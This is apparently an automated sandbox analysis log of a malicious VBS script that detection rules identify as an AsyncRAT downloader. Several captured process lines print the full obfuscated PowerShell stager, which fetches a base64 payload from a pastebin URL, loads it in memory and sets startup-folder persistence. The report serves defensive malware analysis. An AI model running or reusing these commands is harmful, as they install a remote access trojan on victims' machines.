                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848F5177A14_2_00007FF848F5177A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_029A100816_2_029A1008
                Source: sostener.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2028
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2039
                Source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 4.2.powershell.exe.2877ca20000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.2.powershell.exe.287005f0550.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 14.2.powershell.exe.272d6990dc0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.2.powershell.exe.287005ed138.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 14.2.powershell.exe.272d6819978.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 14.2.powershell.exe.272d6819978.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 14.2.powershell.exe.272d698d9a8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 4.2.powershell.exe.28700478df0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 4.2.powershell.exe.28700478df0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 14.2.powershell.exe.272d7b8ec50.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 4.2.powershell.exe.287017daf68.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 4.2.powershell.exe.287017daf68.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 00000004.00000002.2176643102.00000287005E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000010.00000002.2381808798.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 0000000E.00000002.2403141075.00000272D6986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                Source: 00000004.00000002.2275849504.000002877CA20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: Process Memory Space: powershell.exe PID: 1020, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6400, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 5368, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, gNcBSL9UPrQHBDmUF.csCryptographic APIs: 'TransformFinalBlock'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, gNcBSL9UPrQHBDmUF.csCryptographic APIs: 'TransformFinalBlock'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, Hf0jRXweJYx23320j.csCryptographic APIs: 'TransformFinalBlock'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, gNcBSL9UPrQHBDmUF.csCryptographic APIs: 'TransformFinalBlock'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, gNcBSL9UPrQHBDmUF.csCryptographic APIs: 'TransformFinalBlock'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, Hf0jRXweJYx23320j.csCryptographic APIs: 'TransformFinalBlock'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, XYfrwW5V593UMwIH2.csBase64 encoded string: 'NSiFidP4xfNrihzlXDB35Khxj04PhkVTUKw4OhkxgWgicGZYFhCNgnZSMCYOqxA2Lmt2cBAcgz5NeqEkSvZK', 'jkGR6rJJQ9faSjVbXYtAzRb4ajtLkXKBS1zRcG1mw9LaA2xUqOTikhTtYXc86FK8iinzYXRniNUm6Cd6fXRD'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, gNcBSL9UPrQHBDmUF.csBase64 encoded string: 'KXhQCRAD24tV6QfHKI3jylnihUeIKgmm8JxCSu994N88j3QAb4CcU4XupLiDB0DJkq0dWWplLWwpHzJSDmac'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, XYfrwW5V593UMwIH2.csBase64 encoded string: 'NSiFidP4xfNrihzlXDB35Khxj04PhkVTUKw4OhkxgWgicGZYFhCNgnZSMCYOqxA2Lmt2cBAcgz5NeqEkSvZK', 'jkGR6rJJQ9faSjVbXYtAzRb4ajtLkXKBS1zRcG1mw9LaA2xUqOTikhTtYXc86FK8iinzYXRniNUm6Cd6fXRD'
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, gNcBSL9UPrQHBDmUF.csBase64 encoded string: 'KXhQCRAD24tV6QfHKI3jylnihUeIKgmm8JxCSu994N88j3QAb4CcU4XupLiDB0DJkq0dWWplLWwpHzJSDmac'
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 4.2.powershell.exe.287005f0550.1.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 14.2.powershell.exe.272d6990dc0.3.raw.unpack, fVIHnGEA1n2LyrMvHdB5ZJhyHVgWioG.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@25/21@6/6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\___win________________________________________-------.lnk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6148:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\sBk4oyHX2T5F6ww3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_abdusf4f.udj.ps1
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: sostener.vbsReversingLabs: Detection: 15%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\Desktop\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\Desktop\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\user\AppData\Local\Temp\sostener.vbs
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J?Bh?G0?cwBo?GU?I??9?C??Jw?w?DM?Jw?7?CQ?dgB2?GU?cgBy?C??PQ?g?Cc?JQBw?Ho?QQBj?E8?ZwBJ?G4?TQBy?CU?Jw?7?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBy?HY?aQBj?GU?U?Bv?Gk?bgB0?E0?YQBu?GE?ZwBl?HI?XQ?6?Do?UwBl?HI?dgBl?HI?QwBl?HI?d?Bp?GY?aQBj?GE?d?Bl?FY?YQBs?Gk?Z?Bh?HQ?aQBv?G4?QwBh?Gw?b?Bi?GE?YwBr?C??PQ?g?Hs?J?B0?HI?dQBl?H0?OwBb?FM?eQBz?HQ?ZQBt?C4?TgBl?HQ?LgBT?GU?cgB2?Gk?YwBl?F??bwBp?G4?d?BN?GE?bgBh?Gc?ZQBy?F0?Og?6?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?I??9?C??WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?GM?dQBy?Gk?d?B5?F??cgBv?HQ?bwBj?G8?b?BU?Hk?c?Bl?F0?Og?6?FQ?b?Bz?DE?Mg?7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?a?B6?GY?YgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?TgBl?Hc?LQBP?GI?agBl?GM?d??g?E4?ZQB0?C4?VwBl?GI?QwBs?Gk?ZQBu?HQ?KQ?u?EQ?bwB3?G4?b?Bv?GE?Z?BT?HQ?cgBp?G4?Zw?o?C??K?BO?GU?dw?t?E8?YgBq?GU?YwB0?C??TgBl?HQ?LgBX?GU?YgBD?Gw?aQBl?G4?d??p?C4?R?Bv?Hc?bgBs?G8?YQBk?FM?d?By?Gk?bgBn?Cg?JwBo?HQ?d?Bw?Do?Lw?v?H??YQBz?HQ?ZQBi?Gk?bg?u?GM?bwBt?C8?cgBh?Hc?LwBW?Dk?eQ?1?FE?NQB2?HY?Jw?p?C??KQ?g?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Gg?egBm?GI?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?Yg?3?FM?SgBi?Dc?R?Bj?C8?dwBh?HI?LwBt?G8?Yw?u?G4?aQBi?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?HY?dgBl?HI?cg?g?Cw?I??n?F8?XwBf?Hc?aQBu?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?GE?bQBz?Gg?ZQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$amshe = '03';$vverr = 'C:\Users\user\AppData\Local\Temp\sostener.vbs';[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;[Byte[]] $hzfbs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('http://pastebin.com/raw/V9y5Q5vv') ) );[system.AppDomain]::CurrentDomain.Load($hzfbs).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('b7SJb7Dc/war/moc.nibetsap//:sptth' , $vverr , '___win________________________________________-------', $amshe, '1', 'Roda' ));"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Copy-Item 'C:\Users\user\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\user\AppData\Local\Temp\'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
